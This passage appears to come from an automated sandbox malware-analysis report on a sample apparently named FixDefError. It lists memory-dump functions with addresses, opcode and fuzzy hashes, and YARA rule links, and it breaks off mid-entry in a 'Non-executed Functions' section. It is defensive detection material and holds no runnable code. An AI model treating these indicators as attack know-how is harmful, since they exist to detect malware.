                                                                                                                                                                                                                      Function 084E33D0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: bc0edb2ac77c164b2f9bbe613b9117725f3b16bc9a232a4b6254e6737e2ecd4c
                                                                                                                                                                                                                      • Instruction ID: 217093fef72f9c395b9345758d2d2765c91ec2b8cbb64a3be54c3abd3f9be743
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc0edb2ac77c164b2f9bbe613b9117725f3b16bc9a232a4b6254e6737e2ecd4c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AE0D8372041149FD7016B44D41189DBBB5FF5A2607015062E6855F251DE259D01C7D5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E64A4 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 80576fa281b19398f9b6855f8c0b2b649a413fafaeb3df38af2f460fec36dc72
                                                                                                                                                                                                                      • Instruction ID: a75172e858c26a7a1ea2a8edc851e40180e4c0681f0c38d72eec90330d581ce1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80576fa281b19398f9b6855f8c0b2b649a413fafaeb3df38af2f460fec36dc72
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4EE04F74A0020DEFC700EFF4F95196DBBFAFB94204B10855AE84593310EA3A6F01EB60
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084EAEE9 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 20004557516c275a17fd27857f5f7e9236a132c971bbaf0b51911f37f6091628
                                                                                                                                                                                                                      • Instruction ID: d8f30c33ab706cdfa818fe798d0e9bd6b46987e538bc67ae9a01b8370311950a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20004557516c275a17fd27857f5f7e9236a132c971bbaf0b51911f37f6091628
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CE0C2303500108FE708AB68C414BFA32929BCA74AF1040A9E10A8F2E2CAA28C4247D0
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E64A8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 74c0258b299dd30a60982ffc05f91f5b4a5a45cfd0523c5103833785da56c195
                                                                                                                                                                                                                      • Instruction ID: 68fba0f4b5864af62aa6abc34b97fdab6812dea16ecf3986df4d68ba38de796c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74c0258b299dd30a60982ffc05f91f5b4a5a45cfd0523c5103833785da56c195
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BE04F74A0010DEFC700EFB4F95196DBBB9FB54204710855AD80593200EA366F01EB60
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084EB818 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 13eccbb5d42e8abb890a1e27c94aa207e127f8ba968f5c3e94e48ba8e8215b10
                                                                                                                                                                                                                      • Instruction ID: e44f48da141d10572785b23f37bbd4e79ded6d45bc6d268020fd749104d4c51f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13eccbb5d42e8abb890a1e27c94aa207e127f8ba968f5c3e94e48ba8e8215b10
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CD0C9113196F42F978763B828341DA2FE48E8711234A00CBD684CB697C8040C0283B2
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E33E0 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: fc8aede87016c2c22411d720d1d5513d3ba45c10d84087b4f575a03930938927
                                                                                                                                                                                                                      • Instruction ID: faa6d9a7b263f9d68b1287cbef3acb2fbc1e097952567579ba36342f4a8a4eab
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc8aede87016c2c22411d720d1d5513d3ba45c10d84087b4f575a03930938927
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78D05E3A2000189BD701BB99E805CEE7BBAFB996617008062F6858F725DE25AD158BE5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084EC94E Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 691f2c0fa7c1e4cb16e152f52fecb1bfdfce2b37fe87e5f9e3c88ed879981c8a
                                                                                                                                                                                                                      • Instruction ID: a6a5d61d676da7cf1a30a08cfeefbf925f14dafea3d3a06635f37c7fd69f921f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 691f2c0fa7c1e4cb16e152f52fecb1bfdfce2b37fe87e5f9e3c88ed879981c8a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69B09236318978270819B1EE38914EE768E8986876301006BFA09C7B828E895E4202EF
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E1C62 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 8a5e2fe3fdc77df9a1948b4b45bd01e61c3bf42b45e6fabdb99641926ee98dfc
                                                                                                                                                                                                                      • Instruction ID: 2c21cfed96a4cda07febcb57abd8b856b6aa1e7ed0d1aad492f1a8dba8e03c6d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a5e2fe3fdc77df9a1948b4b45bd01e61c3bf42b45e6fabdb99641926ee98dfc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DD002351596C55FC346DB79D4448853F74AE2A51531501DBE045CF533D2159845C761
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E2D28 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1955484b2b814d6115dea0c14764944439208514ea8284d7d0e706c2b5e91e1b
                                                                                                                                                                                                                      • Instruction ID: 13b040a1a8cece11d3faa23235a7394637a69e70eb5782d852a716f372719c09
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1955484b2b814d6115dea0c14764944439208514ea8284d7d0e706c2b5e91e1b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16E0E274A4010ACFD700CFA9D199EADBFB0BB08312F20801AE102EB260CBB49804CF50
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E7D80 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b1bb531b599178cccbc14f214a2847be8907d15c619aca6dba7285ca58188305
                                                                                                                                                                                                                      • Instruction ID: b74a9ef0a7aeb6fefc6797c2371c5e2bcb12a97c48432254c57a8a317ca71dfc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1bb531b599178cccbc14f214a2847be8907d15c619aca6dba7285ca58188305
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6B09B2171423513C604319D741459E76CD5785575F40006BB50D877458CC55D4102D9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084EC950 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 06cf23ba5c7cd47e147e097ce6cbae29d598be91eba3e9e781fd53dd43138f7f
                                                                                                                                                                                                                      • Instruction ID: a0cae9ecdafec6282c8cfa34e730651911aa632fe707d46369aab62e7c7f8502
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06cf23ba5c7cd47e147e097ce6cbae29d598be91eba3e9e781fd53dd43138f7f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CFB0123231457813080971DF38904EE728E49C6C76301006FFE0DC73828E895E0202DF
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084EAEF3 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 67b567a02a2786ef0b4ef51297a6739d051a833b78c7c4402211fbae16911faa
                                                                                                                                                                                                                      • Instruction ID: f95c74fcbfeabe8c19055e572d965e6d1ae41c04a9f687f9cb3aa77cb8d55b30
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67b567a02a2786ef0b4ef51297a6739d051a833b78c7c4402211fbae16911faa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43C092A63050B11F499AB2BD28706FE5AC98ACB66234A009EA289DBB99CD004D0743D6
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E2790 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: deefeb0ef9db56ab2645501437fc18351f6079b61257d940102b2b75e5bd1927
                                                                                                                                                                                                                      • Instruction ID: ef9754e62db6aaa46271632b5afab57edcc3cf3bb799e42135ff6c7fa8f63fba
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: deefeb0ef9db56ab2645501437fc18351f6079b61257d940102b2b75e5bd1927
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40D0123A511244CFDF90DB18EDCA847376AEE40306300D908E0185E312E7649E47C771
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E1B38 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 36a73b55962f7c836d5a24c53c17d84e767600cbd15d71d9b6ab7baad97f4a31
                                                                                                                                                                                                                      • Instruction ID: ed77db1dde1a883b708ef03b4f4f498b0672bb2598e32f87d4a0722df86ece20
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36a73b55962f7c836d5a24c53c17d84e767600cbd15d71d9b6ab7baad97f4a31
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01B092312845098FC310AB68D848BA033AAAF86605F0440F0E14C8BB32DA22B8409B44
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E7BEC Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a91e4ada473ce2ff1df7d9d1d8bb2f36d58c8eb9ad38cbb65a1a0bf0a8579171
                                                                                                                                                                                                                      • Instruction ID: 4ec9103775fcebfea256cbebe26602151f1e0d98fc39addb46450d4a42b5a973
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a91e4ada473ce2ff1df7d9d1d8bb2f36d58c8eb9ad38cbb65a1a0bf0a8579171
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77B012EC110018C6D1A07B694C4C37A3C42BF4031BF84885FE00508242CA3A844B8F13
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E1C70 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 149b3b8abd7c2fab9b7e4a745b5e7cb4a54d10e8afa2e5da7e96e67ea0595db2
                                                                                                                                                                                                                      • Instruction ID: 0666db46a6e83b03bdbc4174638f5755fda2c091e5cd55f036d48e3d7623dd39
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 149b3b8abd7c2fab9b7e4a745b5e7cb4a54d10e8afa2e5da7e96e67ea0595db2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44B092301A02088F82009A59D444C4033ACAF08A1534100D0E1088B632C621FC008A80
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E7BE5 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: ecff90c23b8d3ef9bf595af1cff8ca3eecffabbb08b5642e252660ba973fa769
                                                                                                                                                                                                                      • Instruction ID: a7ac93b52eecfb79b6a4239ed2bd84b8dd3f0cab0ecd71fb015a738c780cd71f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecff90c23b8d3ef9bf595af1cff8ca3eecffabbb08b5642e252660ba973fa769
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13A00242C0D5C1978353063404251756D39095353375957C79170561E2950554454565
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                      Function 011D1250 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 226f933c2d8eb1c481798866a6d987719a4da39e85ea1cd08b5ce0c85e203993
                                                                                                                                                                                                                      • Instruction ID: 1339c2fc68b3028394f8a50c78d4e128ff3d58becde429eb83edbca648b17af8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 226f933c2d8eb1c481798866a6d987719a4da39e85ea1cd08b5ce0c85e203993
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71515831B08311EFCB0DCFA8C8906AABBB2FB85360B15816BD005DBA56C775DD15CB96
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D27B2 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 73e487c8aec3e96d7e5f44c460b5947c7ecf36a300ccd3e484505caad969317f
                                                                                                                                                                                                                      • Instruction ID: ae2400b1ed2d4763eff0ef67452ec276ace05511acdd4edc0e590d193f096272
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73e487c8aec3e96d7e5f44c460b5947c7ecf36a300ccd3e484505caad969317f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7041A732610616CFC76DCB6DC551A67B7F2FF85310B16882AE07ADBA54D334D941CB42
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D32F8 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b5d25461be8888d658cfed17465f95d9368d4979bd95ff29feb4901c30cf0858
                                                                                                                                                                                                                      • Instruction ID: 1261871ab115bd5623a727160d7212930ffd871f1f7782b6bbd5fc39eb0f5fcf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5d25461be8888d658cfed17465f95d9368d4979bd95ff29feb4901c30cf0858
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6341A476F28219DFCB08CF59C9915AEFBB5FB88200B958166D825E7351CB34D901CB93
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D1240 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 59318ffa9d9cd2a711a71520bf787763cde6c11cef8dd46917ab9080f0b242a8
                                                                                                                                                                                                                      • Instruction ID: 25715214a3a1fa802d41644bd10d6fabf0fb1ca97a3e6b30ba1ff38316b16b38
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59318ffa9d9cd2a711a71520bf787763cde6c11cef8dd46917ab9080f0b242a8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7412372B08201FFDB0CCF98C9805ABBB71FB85390B61852AD516DBA90C771E914CBD6
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D3308 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: ad5e2b21a8e2bb6748b6a470fad20db3d689a4bcd1a19af7effcd52d3e284f73
                                                                                                                                                                                                                      • Instruction ID: fdf65a3f97a5677c0f999c0fb27ce0b936ee0c38802e777bcc1dc1c93e1e933f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad5e2b21a8e2bb6748b6a470fad20db3d689a4bcd1a19af7effcd52d3e284f73
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D418476F28219DBCB4CCB59CA8156EF7F6BB88210B958126D425E7350CB34D901CB93
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D34B8 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: e450c4ed42e9a5ed2b8c1c466cf15e585b8fa7db278160516ff510f4fc8dbe77
                                                                                                                                                                                                                      • Instruction ID: f81afbd6144fb94c25c00ff70b540171b3df063299604dbcf91731aee0edb09c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e450c4ed42e9a5ed2b8c1c466cf15e585b8fa7db278160516ff510f4fc8dbe77
